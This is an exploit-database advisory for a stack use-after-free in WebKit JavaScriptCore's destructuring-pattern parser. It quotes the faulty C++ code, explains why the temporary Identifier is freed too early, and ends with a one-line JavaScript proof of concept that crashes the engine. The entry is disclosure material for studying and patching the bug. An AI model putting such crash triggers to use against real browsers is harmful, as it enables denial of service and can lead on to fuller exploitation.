WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free

EDB-ID: 42377
Author: Google Security Research
Published: 2017-07-25
CVE: N/A
Type: Dos
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: Use After Free
Vulnerable App: N/A

  
Here's a snippet of ObjectPatternNode::appendEntry.

void appendEntry(const JSTokenLocation&, ExpressionNode* propertyExpression, DestructuringPatternNode* pattern, ExpressionNode* defaultValue, BindingType bindingType)
{
m_targetPatterns.append(Entry{ Identifier(), propertyExpression, false, pattern, defaultValue, bindingType });
}

Here's the definition of Entry.

struct Entry {
const Identifier& propertyName;
ExpressionNode* propertyExpression;
bool wasString;
DestructuringPatternNode* pattern;
ExpressionNode* defaultValue;
BindingType bindingType;
};

The Identifier object created by "Identifier()" is in the stack. So it will get freed in the end of the appendEntry method.

PoC:

var {[a]: b, ...[]} = {};

Related Posts

Comments